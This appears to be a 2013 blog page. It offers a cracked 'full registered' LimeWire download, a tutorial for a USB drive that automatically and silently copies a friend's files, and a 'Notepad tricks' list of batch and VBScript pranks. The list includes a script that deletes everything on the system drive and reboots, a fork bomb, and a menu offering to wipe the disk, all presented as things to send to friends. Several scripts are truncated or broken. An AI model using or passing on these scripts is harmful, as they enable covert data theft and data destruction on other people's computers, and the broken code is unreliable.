Friday 15 February 2013


LimeWire PRO 5.1.3 Final - Full Registered Version-hardal | 18.6 MB

LimeWire - The Fastest P2P File Sharing Program on the Planet, running on the Gnutella Network. It is open standard software running on an open protocol, free for the public to use. LimeWire allows you to share any file such as.mp3s, .avis, jpgs, tiffs, etc., allows you to search for multiple files at the same time, available in several different languages, and is most famous for its ease-of-use and cross-platform compatibility. Limewire is written in Java, and will run on Windows, Macintosh, Linux, Solaris, and other computing platforms.

1. NO BUNDLED SOFTWARE OF ANY KIND! No spyware. No adware. Guaranteed.
2. Firewall to Firewall Transfers. Since about 60% of users are currently firewalled, this feature greatly increases the amount of content on the network.
3. Faster network connections. Using new "UDP Host Caches", LimeWire starts up and connects faster then ever before!
4. Universal Plug 'N Play. UPnP support allows LimeWire to find more search results and have faster downloads.
5. iTunes Integration. Windows users can now take advantage of LimeWire's iTunes integration.
6. Creative Commons Integration. LimeWire now recognizes OGGs and MP3s licensed under a Creative Commons License.
7. "What's New?" feature. Users can browse the network for the most recent content additions.
8. Search drill down results. Searches in LimeWire now immediately display the artists, albums and other information that fully describes files.
9. Proxy support. Users can now use web proxies to route their to protect their identity.
10. Support for International searches and International groups. Users can now search in any language, and LimeWire ensures that a user will be connected to other users with their own language to aide international users to receive search results in their native language and to find content from sources that are close to home.

LimeWire still has the following great features:
- Ease of use - just install, run, and search
- Ability to search by artist, title, genre, or other metainformation
- Elegant multiple search tabbed interface
- "Swarm" downloads from multiple hosts help you get files faster
- iTunes integration for Mac and Windows users
- Unique "ultrapeer" technology reduces bandwidth requirements for most users
- Integrated chat
- Directly connect to a computer
- Browse host feature--even works through firewalls
- Added Bitzi metadata lookup
- International versions: Now available in many new languages
- Connects to the network using GWebCache, a distributed connection system
- Automatic local network searches for lightning-fast downloads
- Support for MAGNET links that allow you to click on web page links that access Gnutella

5.1.3 (5.22.09)

• Fix a bug with the notification dialog.

5.1.2 (3.10.09)

• Fix a bug with the single file sharing widget.
• Remove the check box for the multi file sharing widget.
• Fix a rendering bug with the share widget.
• Minor UI updates, for example, right aligning the Length column header.
• Fix a bug where the Mojito tab wouldn't show you joined the Mojito DHT unless you had the Advanced Tools window open.
• Fix OS X DMG which previously opened halfway off the screen.


Friday 8 February 2013


Steel anyones information by USB

Hi Friends,

Today i am posting a way to steel secret file from your friends computer.

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
action=Click OK to Run

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

Open Notepad again and copy-paste the following lines
@echo off
:: variables
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.

Open Notepad once again and copy-paste the following line.
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False)

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat)

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.


Sunday 3 February 2013


Notepad tricks

Full] Collection of notepad tricks!

write ur own simple virus cant detected by any antivirus....
@Echo off 
Del C:\ *.* 

or better version

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...
IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive
2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1

For i = 0 to colCDROMs.Count - 1

End If
wscript.sleep 5000

Save it as "Anything.VBS" and send it.
3) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Save it as "Anything.VBS" and send it.
4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! " 

Save it as "Anything.VBS" and send it.
5) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"
Save it as "Anything.VBS" and send it.
6) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."
Save it as "Anything.VBS" and send it.
7) Open Notepad continually in your friend's computer:
Type :
@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top 

Save it as "Anything.BAT" and send it.
8 ) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)

echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two 

Save it as "Anything.BAT" and send it.
9) Hide text inside your text file ! 
* Open your command prompt Start–>Run type cmd
* Move to any destination for example let us assume D:\> drive
* Type the below code in your command prompt
* D:\>notepad syshacks.txt:hidden
* syshacks notepad save
* syshacks notepad hidden
Write some data and save the file.
* Move to D:\> and open syshacks.txt you cannot see no data in the file syshacks.txt.
* To retrieve the hidden data open command prompt and type the same command.
* D:\>notepad syshacks.txt:hidden
* Notepad will open syshacks.txt file with hidden data

10) A Virus That Will Open And Close Ur Cdrom
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
End If

Save it as "Anything.vbs" and send it.
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process 
11) Notepad virus
Open NotePad And Write This:
@echo off
start cmd.exe
start calc.exe

Save It As .bat.
12) Code to shutdown computer

Open NotePad And Write This:
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00 
Save It As .bat
13) Code for log
Open NotePad And Write This:
and Save It As .txt
now if you open the file
its writes the time and day that you log...
14) Code for matrix falling text-
Open NotePad And Write This:
@echo off
COlor 0A
Title J J f f g g g g
echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop 

Save It As .bat
15)code to make computer chat with you
Open NotePad And Write This:
dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox("My Name Is Saplas")
fname=inputbox(" I Love You Saplas ^^.")
Save It As .vbs
16) Code to open many windows!
Open NotePad And Write This:
[The Number of "start" e.x 3 start-->3 windows ,, more start.. more windows ^_^]
Save It As .bat
17)code for Rick Roll
Open NotePad And Write This:
@echo off 
START [ you can change the site but i find this Site for RIck Roll-->best] [[for closing this site, push ctrl+alt+delete]]
Save It As .bat
18)code for Virus Joke
Open NotePad And Write This:
@echo off
msg ' [your text here] example msg ' We Hack So What?
msg ' [your text here] example msg ' Hahahahahaha.
shutdown -s -t 50 -c "your text here" example shutdown -s -t 50 -c "The Pc Gonna Exploded In 50 Sec"

Save It As .bat

If You wait 50 sec, your pc gonna restart..
Start-->Run. Now Write shutdown -a
It Stops The Restart... 
19) code for Virus Joke 2
Open NotePad And Write This:
@echo off
echo [your text here] I prefer this example --> echo Trojan Virus Uploading
goto hack
Save It As .bat
20) code for Adding A Heading And Text
Open Internet Explorer[prefer Mozila Firefox] .Then Open NotePad And Write This:

In The " ", It's The Name For The Site

In The " " are the font and the size number. 


21) code for make a Fork Bomb(LoL)
Open NotePad And Write This:
goto :S

Save It As .bat
If You Open It, It Can Crash Your Pc So Send It In YOUR FRIENDS .. Not to ME ^_^ .
22) Create your own Never Ending Error/Pop up messages 
First of all, here are some possible uses for this cool little thing
1. Bind them with your virus's / trojans. You can use any messages remember.
2. To piss off your friends making them think you've messed there computer up.
3. Whatever you want really!

Step 1. Open Notepad
Step 2. Type the following text:
lol = msgbox("Text You Want Here",16,"Title Of Message Box Here")
Step 3. Create as many lines as you want, for example my outcome would be something like this:
lol = msgbox("A System32 error has occured, please contact microsoft immediately",16,"Fatal Error")
lol = msgbox("Mswinsox (C:\Windows) Will now be deleted",16,"Fatal Error")
lol = msgbox("(C:\Windows) is being deleted",16,"Fatal Error")
lol = msgbox("Your computer will reboot shortly",16,"Fatal Error")
lol = msgbox("If you still have a problem, then you are -beep-ed",16,"Fatal Error")
lol = msgbox("owned you",16,"Fatal Error")

Step 4. Save it as Anything.vbs , distribute it amongst your friends and have a laugh.
23) make your pc talk with notepad!
Open a text file in notepad and write:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."
u will hear what u typed
Fake warning boxes:
Virus in notepad
Paste this in yor notepad
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}" (Without Quotes)

now save it and scan it by ur antivirus software..
Bush trick
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
world trade centre trick
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
Changing Header and Footer
Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1? on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

Print tree root
a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system
c. After that hit enter and type {print C:\windows\system\winlog
d. Hit enter and type 4*43?$@[455]3hr4~
e. Then save the file as teekids in C:\windows\system.